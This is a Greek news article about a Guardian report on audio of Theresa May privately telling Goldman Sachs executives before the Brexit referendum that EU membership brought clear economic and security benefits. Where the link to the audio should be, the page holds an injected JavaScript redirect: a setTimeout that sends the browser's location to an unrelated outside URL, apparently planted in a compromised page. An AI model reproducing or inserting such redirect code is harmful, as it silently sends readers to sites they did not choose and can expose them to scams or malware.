Ηχητικό ντοκουμέντο αποκαλύπτει τι πραγματικά πίστευε η Τερέζα Μέι για το Brexit

0
5

 

Στην επιφάνεια φέρνει αποκλειστικό δημοσίευμα του Guardian ηχητικό ντοκουμέντο από την ομιλία της Τερέζα Μέι σε ιδιωτική ομιλία της στις 26 Μαΐου ενώπιον των στελεχών της μεγάλης επενδυτικής τράπεζας Goldman Sachs λίγες εβδομάδες πριν από το δημοψήφισμα.

Η νυν πρωθυπουργός της Βρετανίας είχε προειδοποιήσει με μεγάλη σαφήνεια για τους κινδύνους που θα διέτρεχε η Βρετανία σε περίπτωση εξόδου από την Ευρωπαϊκή Ένωση, αλλά σε όλη την περίοδο πριν από το δημοψήφισμα επέλεξε να διατηρήσει μία αμφίσημη ρητορική που δημιούργησε την εικόνα του διπλού πράκτορα στον στρατόπεδό της ή απλώς του ανθρώπου που δεν ενδιαφέρεται παρά για το πολιτικό του μέλλον.

Σύμφωνα με το δημοσίευμα του Guardian, η τότε υπουργός Εσωτερικών επέλεξε να χρησιμοποιήσει πολύ σαφέστερα επιχειρήματα για να εξηγήσει ποια θα ήταν τα οφέλη για τη Βρετανία από την παραμονή της στην ΕΕ.

Όπως είχε δηλώσει, ήρθε η ώρα για το Ηνωμένο Βασίλειο να αναλάβει ηγετικό ρόλο στο πλαίσιο της Ευρωπαϊκής Ένωσης και έφθασε μέχρι να εκφράσει την ελπίδα ότι οι ψηφοφόροι θα κοιτάξουν προς το μέλλον και όχι προς το παρελθόν.

«Πιστεύω ότι τα οικονομικά επιχειρήματα είναι σαφή…Πιστεύω ότι η συμμετοχή σε ένα εμπορικό μπλοκ 500 εκατομμυρίων ανθρώπων είναι σημαντικό για εμάς. Πιστεύω… ότι ένα από τα θέματα είναι ότι πολλοί άνθρωποι επενδύουν εδώ στο Ηνωμένο Βασίλειο διότι το Ηνωμένο Βασίλειο βρίσκεται στην Ευρώπη….

Εάν δεν ήμασταν στην Ευρώπη, πιστεύω ότι θα υπήρχαν εταιρείες και επιχειρήσεις που θα εξέταζαν μήπως θα έπρεπε να αναπτύξουν παρουσία στην ηπειρωτική Ευρώπη, παρά στο Ηνωμένο Βασίλειο. Κατά συνέπεια, πιστεύω ότι υπάρχουν προφανή οικονομικά οφέλη» από την παραμονή στην ΕΕ, είχε πει τότε.

Τότε, η Τερέζα Μέι φαίνεται ότι είχε ισχυρά επιχειρήματα υπέρ της παραμονής της χώρας της στην Ευρωπαϊκή Ένωση και στον τομέα της ασφάλειας, αφού εμπιστεύθηκε ιδιωτικά στα στελέχη της Goldman Sacks ότι το ευρωπαϊκό ένταλμα σύλληψης και η ανταλλαγή πληροφοριών ανάμεσα στην αστυνομία και τις υπηρεσίες Πληροφοριών εξυπηρετούν τα συμφέροντα της Βρετανίας.

Ακούστε εδώ το ηχητικό ντοκουμέντο setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here